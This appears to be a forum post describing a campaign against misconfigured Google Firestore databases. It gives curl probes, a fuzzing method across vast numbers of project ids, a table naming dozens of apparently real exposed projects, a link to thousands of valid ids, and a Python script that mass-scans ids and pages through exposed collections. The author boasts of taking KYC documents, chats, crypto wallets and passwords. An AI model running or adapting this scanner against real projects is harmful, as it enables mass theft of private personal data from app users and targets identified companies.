Json Cloud: Why hack when it's leaking? How we attacked Google Firestore customers.
- #1
If Firestore security rules are configured to allow public access (i.e., allow read, write: if true;), you can use a curl command to test whether the collection is publicly readable. You make a GET request to the Firestore REST API:
curl -X GET \
  'https://firestore.googleapis.com/v1/projects/YOUR_PROJECT_ID/databases/(default)/documents/YOUR_COLLECTION_NAME'
Replace the following:
YOUR_PROJECT_ID with your actual Firebase project ID. View 7k valid project names from pastee(.)dev/p/iSWMykno
YOUR_COLLECTION_NAME with the name of the Firestore collection you want to check.
To determine whether a YOUR_PROJECT_ID value is valid you can use any COLLECTION_NAME. If it is a valid YOUR_PROJECT_ID you will get a single empty JSON object returned in the response body: {}
curl -X GET 'https://firestore.googleapis.com/v1/projects/YOUR_PROJECT_ID/databases/(default)/documents/YOUR_COLLECTION_NAME'
{}
Now how do we determine if there's data in the store? Easy. We check the response body length. Firestore uses pagination, making it easy to exfiltrate large amounts of data.
By fuzzing the COLLECTION_NAME with a common database name like 'users' against billions of PROJECT_IDs you can gather a list of valid PROJECT_IDs and filter on the response body to find stores with data exposed.
Status Size Words Lines Duration FUZZ WORD
200 194989 98112 7936 2303 axilam users
200 1202522 108410 8507 855 agrowex users
200 221462 77782 8527 397 mybsic users
200 239434 100482 8809 2082 dpawon users
200 253143 123716 8923 1036 illust users
200 215573 82074 9007 203 sekoir users
200 280245 146758 9370 229 suufle users
200 266334 104804 9625 298 wiinik users
200 295640 148353 10582 264 giplan users
200 403088 245483 10783 234 feedms users
200 311981 142614 10843 1853 cvahub users
200 303903 102609 11143 271 beefixi users
200 276979 118526 11527 1608 lynomi users
200 318078 140373 11791 374 fiestr users
200 294200 143743 11836 222 kritle users
200 350809 220065 12127 1851 aweqfy users
200 329928 158442 12973 398 axicard users
200 688798 490796 13045 2287 aiigcse users
200 381727 127296 13819 2348 weimns users
200 460807 204637 14128 2014 myjobo users
200 429839 237853 14134 161 amlsafe users
200 384717 180823 14338 1023 bakanda users
200 424419 201133 14434 1691 kliing users
200 406283 180137 15913 1732 rakori users
200 444721 205270 16573 2154 antargo users
200 566061 330082 16803 174 shioja users
200 537360 241991 19759 849 haydai users
200 862035 479362 20854 461 giflly users
200 697797 488785 22273 430 okeoka users
200 546823 231019 22642 1604 oliive users
200 639988 274265 23920 340 lazzos users
200 844905 470082 27412 192 bobbll users
200 981092 518457 36784 351 immudi users
200 1214963 773767 38170 301 hecklr users
200 1255432 801447 41625 810 idccff users
200 2055781 1567207 57424 1095 abegsai users
200 2308694 1486563 77677 191 iaclub users
200 6991430 5736283 131569 632 retlab users
200 15380488 11106389 380679 1400 brewfm users
OK, now that we have discussed how to find the exposed data, what did we find from this campaign?
Let's start with exposed ID/KYC documents.
Chat messages from phone apps.
Grey-area streaming apps (t(.)me/cricfysports).
The best loot was from Clanker apps that used Firestore. Other data that was found was user shopping data, user crypto wallets and user passwords.
Verifying the data was not hard, and finding the companies that were leaking it was just as easy.
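The probe-classify-paginate loop described above (confirm a project id from the empty `{}` body, spot exposed stores from a body carrying documents, then follow the pagination to pull the rest), written out as an added example. This is not code from the original post; it assumes the documented Firestore REST v1 listDocuments endpoint with its pageSize and pageToken query parameters, and the response interpretation follows the post. The project ids, document contents and error bodies in SAMPLE_RESPONSES are constructed so the survey can run offline; pass a real wordlist on stdin to run it live against the same endpoint.

```python
"""Firestore public-read survey: probe project ids, classify, and page through exposed collections.

Added example, not code from the original post. Assumes the documented
Firestore REST v1 listDocuments endpoint (pageSize / pageToken query params):
  https://firestore.googleapis.com/v1/projects/{project}/databases/(default)/documents/{collection}
Interpretation follows the post: an unauthenticated 200 with "{}" means the
project id exists but nothing was readable; a 200 carrying a "documents" array
means the rules allow public reads. SAMPLE_RESPONSES is constructed test data.
"""
from __future__ import annotations
import json
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Iterator

BASE = "https://firestore.googleapis.com/v1/projects/{project}/databases/(default)/documents/{collection}"
Fetch = Callable[[str], tuple[int, str]]  # url -> (status, body); injectable so the logic is testable offline


def document_url(project: str, collection: str, page_token: str | None = None, page_size: int = 300) -> str:
    """listDocuments URL; pageToken continues the page a previous response referenced."""
    params = {"pageSize": page_size}
    if page_token:
        params["pageToken"] = page_token
    return BASE.format(project=project, collection=collection) + "?" + urllib.parse.urlencode(params)


def classify(status: int, body: str) -> str:
    """EXPOSED: 200 with documents (public reads allowed and data present).
    EMPTY:   200 with "{}" (what the post uses to confirm a valid project id).
    DENIED:  403/404, rules refused the read or the project does not exist (not distinguished here).
    OTHER:   anything else (throttling, transport errors, non-JSON bodies)."""
    if status in (403, 404):
        return "DENIED"
    if status != 200:
        return "OTHER"
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "OTHER"
    return "EXPOSED" if isinstance(data, dict) and data.get("documents") else "EMPTY"


def walk(fetch: Fetch, project: str, collection: str) -> Iterator[tuple[int, str]]:
    """Yield the first page and every nextPageToken continuation (the pagination the post relies on)."""
    token = None
    while True:
        status, body = fetch(document_url(project, collection, token))
        yield status, body
        if status != 200:
            return
        try:
            token = json.loads(body).get("nextPageToken")
        except (json.JSONDecodeError, AttributeError):
            return
        if not token:
            return


def survey(project_ids: Iterable[str], collection: str, fetch: Fetch) -> dict[str, dict]:
    """One row per candidate id: verdict from the first page, then document/byte/page totals."""
    results = {}
    for pid in project_ids:
        verdict, docs, size, pages = None, 0, 0, 0
        for status, body in walk(fetch, pid, collection):
            page_verdict = classify(status, body)
            verdict = verdict or page_verdict
            pages += 1
            size += len(body)
            if page_verdict == "EXPOSED":
                docs += len(json.loads(body)["documents"])
        results[pid] = {"verdict": verdict, "documents": docs, "bytes": size, "pages": pages}
    return results


def http_fetch(url: str, timeout: float = 10.0) -> tuple[int, str]:
    """Unauthenticated GET; HTTP error responses are returned as (status, body) rather than raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "firestore-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def _doc(pid: str, doc_id: str, email: str) -> dict:  # constructed document in Firestore REST shape
    return {"name": f"projects/{pid}/databases/(default)/documents/users/{doc_id}",
            "fields": {"email": {"stringValue": email}}}


# Constructed responses keyed by exact URL: one exposed store (two pages), one empty, one denied.
SAMPLE_RESPONSES = {
    document_url("exposed-demo", "users"): (200, json.dumps(
        {"documents": [_doc("exposed-demo", "u1", "a@example.test"), _doc("exposed-demo", "u2", "b@example.test")],
         "nextPageToken": "tok1"})),
    document_url("exposed-demo", "users", "tok1"): (200, json.dumps(
        {"documents": [_doc("exposed-demo", "u3", "c@example.test")]})),
    document_url("empty-demo", "users"): (200, "{}"),
    document_url("locked-demo", "users"): (403, json.dumps(
        {"error": {"code": 403, "message": "Missing or insufficient permissions.", "status": "PERMISSION_DENIED"}})),
}


def sample_fetch(url: str) -> tuple[int, str]:
    return SAMPLE_RESPONSES.get(url, (404, '{"error": {"code": 404, "status": "NOT_FOUND"}}'))


def demo() -> dict[str, dict]:
    return survey(["exposed-demo", "empty-demo", "locked-demo", "unknown-demo"], "users", sample_fetch)


if __name__ == "__main__":
    # Live: python3 firestore_survey.py users < project_ids.txt  (one candidate id per line). No stdin: offline demo.
    collection = sys.argv[1] if len(sys.argv) > 1 else "users"
    ids = [] if sys.stdin.isatty() else [line.strip() for line in sys.stdin if line.strip()]
    for pid, row in (survey(ids, collection, http_fetch) if ids else demo()).items():
        print(f"{row['verdict']:8} docs={row['documents']:<6} bytes={row['bytes']:<8} pages={row['pages']} {pid}")
```

The verdict comes from the first page only, which mirrors the post's size-based triage: a reachable project with nothing readable answers `{}`, and only an EXPOSED first page is worth paginating. A 403 and a nonexistent project both land in DENIED here, so a DENIED row says nothing about whether the id is real; the post's `{}` check is the positive confirmation.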